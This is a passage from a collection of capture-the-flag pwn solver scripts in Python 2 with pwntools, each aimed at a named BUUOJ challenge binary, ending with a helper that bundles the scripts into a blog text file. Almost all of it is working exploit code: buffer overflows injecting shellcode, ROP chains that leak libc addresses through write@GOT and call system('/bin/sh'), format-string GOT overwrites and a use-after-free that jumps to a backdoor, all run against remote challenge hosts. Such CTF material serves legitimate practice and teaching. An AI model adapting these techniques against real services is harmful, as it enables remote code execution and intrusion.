p = process('./ez_pz_hackover_2016')
else:
p = remote('node3.buuoj.cn',29304)
#elf = ELF('ez_pz_hackover_2016')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recvuntil('Yippie, lets crash: ')
# "0x" + 8 hex digits = 10 characters.
s_addr = int(p.recv(10), 16)
p.recvuntil('> ')
#print(hex(s_addr))
# "crashme\0", NUL padding up to 26 bytes, s_addr-0x1c, then the shellcode.
payload = 'crashme\x00'+'\x00'*(26-8)+p32(s_addr-0x1c) + asm(shellcraft.sh())
#gdb.attach(p)
p.sendline(payload)
p.interactive()
NO.26 ciscn_2019_es_2_sovle
exp
#-*- coding:utf-8-*-
# ciscn_2019_es_2 solver (Python 2 / pwntools): first input leaks a saved
# ebp, second input pivots with the leave gadget into a buffer holding
# system@PLT and "/bin/sh". `local = 1` and gdb.attach is active: set up
# for a local debugging session.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="i386", log_level="debug")
local = 1
if local:
p = process('./ciscn_2019_es_2')
else:
p = remote('node3.buuoj.cn',26426)
elf = ELF('ciscn_2019_es_2')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system_plt = elf.plt['system']
# vuln and hack are defined but unused below.
vuln = 0x08048595
hack = 0x0804854B
leave = 0x080484B8
payload = '/bin/sh'
payload = payload.ljust(0x27,'a')
p.recvuntil('\n')
# Active debugger attach; not suitable for unattended runs.
gdb.attach(p)
p.sendline(payload)
# Skip 0x2f echoed bytes, read the 4-byte value, subtract 0x38 (frame
# layout constant for this binary — TODO confirm).
p.recv(0x2f)
ebp_addr = u32(p.recv(4)) - 0x38
print "ebd_addr =>" , hex(ebp_addr)
# Fake frame: 4 junk bytes, system@PLT, fake return, pointer to the
# "/bin/sh" that follows at ebp_addr+0x10.
payload = 'bbbb'+ p32(system_plt) +'cccc'+p32(ebp_addr+0x10)+'/bin/sh\x00'
payload = payload.ljust(0x28,'d')
payload += p32(ebp_addr)+p32(leave)
p.sendline(payload)
p.interactive()
NO.27 jarvisoj_level3_sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_level3 solver (Python 2 / pwntools): write@PLT leak of write@GOT,
# libc identified via LibcSearcher, then system("/bin/sh").
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_level3')
else:
p = remote('node3.buuoj.cn',28355)
elf = ELF('jarvisoj_level3')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
# 0x88 + 4 bytes of filler, write(1, write_got, 4), return to main.
payload = 'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
#gdb.attach(p)
#print hex(len(payload))
p.recvuntil('Input:\n')
p.sendline(payload)
write_addr = u32(p.recv(4))
#print hex(write_addr)
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = libc.dump('system') + offset
binsh = libc.dump('str_bin_sh') + offset
payload = 'a'*(0x88+4)+p32(system)+p32(main)+p32(binsh)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.28 [BJDCTF 2nd]ydsneedgirlfriend2_sovle
exp
#-*- coding:utf-8-*-
# [BJDCTF 2nd]ydsneedgirlfriend2 solver (Python 2 / pwntools): menu driver
# (1 add / 2 delete / 3 show); add after delete, then show index 0.
# Helper bodies are not indented in this listing.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[BJDCTF 2nd]ydsneedgirlfriend2')
else:
p = remote('node3.buuoj.cn',26424)
elf = ELF('[BJDCTF 2nd]ydsneedgirlfriend2')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Menu 1: add an entry of length `size` with content `context`.
# NOTE(review): the parameter name `context` shadows pwntools' global
# `context` inside this function (harmless here, but easy to trip over).
def add(size,context):
p.recvuntil("u choice :\n")
p.sendline(str(1))
p.recvuntil("Please input the length of her name:\n")
p.sendline(str(size))
p.recvuntil("Please tell me her name:\n")
p.sendline(context)
# Menu 2: delete entry `index`.
def delete(index):
p.recvuntil("u choice :\n")
p.sendline(str(2))
p.recvuntil("Index :")
p.sendline(str(index))
# Menu 3: show entry `index`.
def show(index):
p.recvuntil("u choice :\n")
p.sendline(str(3))
p.recvuntil("Index :")
p.sendline(str(index))
backdoor = 0x400D86
add(0x20,"a"*0x10)
delete(0)
# The 0x10-byte entry's content is 8 zero bytes followed by backdoor.
add(0x10,p64(0)+p64(backdoor))
show(0)
p.interactive()
NO.29 jarvisoj_fm _sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_fm solver (Python 2 / pwntools): a single %n format-string write.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_fm')
else:
p = remote('node3.buuoj.cn',27403)
#elf = ELF('')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
x = 0x0804A02C
# Address first (4 characters printed so far), then %11$n writes that
# count into it.
payload = p32(x)+"%11$n" #fmtstr_payload(offset,{x:pad})
p.sendline(payload)
p.interactive()
NO.30 [BJDCTF 2nd]r2t4 _sovle
exp
#-*- coding:utf-8-*-
# [BJDCTF 2nd]r2t4 solver (Python 2 / pwntools): two %hn writes covering
# the GOT entry of __stack_chk_fail (high half first, then low half).
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[BJDCTF 2nd]r2t4')
else:
p = remote('node3.buuoj.cn',26399)
elf = ELF('[BJDCTF 2nd]r2t4')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# backdoor, bss and leave are defined but unused in the payload.
backdoor = 0x00400626
bss = 0x0601050
leave = 0x004006BA
__stack_chk_fail = elf.got['__stack_chk_fail']
# 'aaa' + 61 chars = 64 written before %9$hn; +1510 = 1574 before %10$hn.
# The two addresses are placed at argument offsets 9 and 10.
payload = 'aaa%61c%9$hn%1510c%10$hn'+p64(__stack_chk_fail+2)+p64(__stack_chk_fail)
p.sendline(payload)
p.interactive()
NO.31 jarvisoj_tell_me_something_sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_tell_me_something solver (Python 2 / pwntools): one overflow
# returning to the function at 0x400620.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_tell_me_something')
else:
p = remote('node3.buuoj.cn',26222)
elf = ELF('jarvisoj_tell_me_something')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# NOTE(review): good_game is defined but the payload repeats the literal
# value; the two are equal.
good_game = 0x000400620
payload = 'a'*(0x88)+p64(0x0400620)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.32 jarvisoj_level4_sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_level4 solver (Python 2 / pwntools): same leak-then-system
# shape as the level3 solver, without a prompt to wait for.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_level4')
else:
p = remote('node3.buuoj.cn',26528)
elf = ELF('jarvisoj_level4')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
# write(1, write_got, 4), return to main.
payload = 'a'*(0x88+4) + p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
print hex(write_addr)
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = libc.dump('system') + offset
binsh = libc.dump('str_bin_sh') + offset
payload = 'a'*(0x88+4) + p32(system)+p32(main)+p32(binsh)
p.sendline(payload)
p.interactive()
NO.33 jarvisoj_level3_x64_sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_level3_x64 solver (Python 2 / pwntools): 64-bit write leak via
# pop rdi / pop rsi;r15 gadgets, then system("/bin/sh"). `local = 1` and
# gdb.attach is active: set up for a local debugging session.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./jarvisoj_level3_x64')
else:
p = remote('node3.buuoj.cn',29849)
elf = ELF('jarvisoj_level3_x64')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
#print hex(write_plt),hex(write_got)
# write(1, write_got, <rdx as left by the program>), return to main.
payload = 'a'*(0x80+8)+p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main)
# Active debugger attach; not suitable for unattended runs.
gdb.attach(p)
p.recvuntil('\n')
p.sendline(payload)
write_addr = u64(p.recv(8))
print hex(write_addr)
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = libc.dump('system') + offset
binsh = libc.dump('str_bin_sh') + offset
payload = 'a'*(0x80+8) +p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
p.sendline(payload)
p.interactive()
# NOTE(review): duplicated call; it only runs after the first interactive
# session ends, against a connection that is presumably already closed.
p.interactive()
NO.34 1exp2txt(for blog)_sovle
exp
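#-*- coding:utf-8-*-
"""Concatenate every ``.py`` solver under a directory into one text file.

Each script becomes a ``#NO.xx <stem>`` heading followed by an ``###exp``
section holding the script source inside a code fence. Scripts are ordered
by modification time, oldest first.
"""
import os


def collect_exploits(root='./', out_path='1exp.txt'):
    """Write all ``.py`` files under *root* into *out_path* as fenced sections.

    Args:
        root: Directory walked recursively for ``.py`` files.
        out_path: Output file; overwritten if it already exists.

    Returns:
        The number of scripts written.

    Files are read and written in text mode with the platform default
    encoding, as the original script did.
    """
    scripts = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1] == '.py':
                # Keep the full path: the original looked every file up
                # under './' only, which raised for scripts in sub-directories.
                scripts.append(os.path.join(dirpath, name))
    scripts.sort(key=os.path.getmtime)
    # `with` guarantees the output file is flushed and closed on every exit.
    with open(out_path, 'w') as out:
        for number, path in enumerate(scripts):
            # Heading uses the file name without its extension.
            stem = os.path.splitext(os.path.basename(path))[0]
            with open(path, 'r') as src:
                body = src.read()
            out.write('\n#NO.' + str(number).rjust(2, '0') + ' ' + stem + '\n\n###exp\n```\n')
            out.write(body)
            out.write('```\n\n\n')
    return len(scripts)


if __name__ == '__main__':
    collect_exploits()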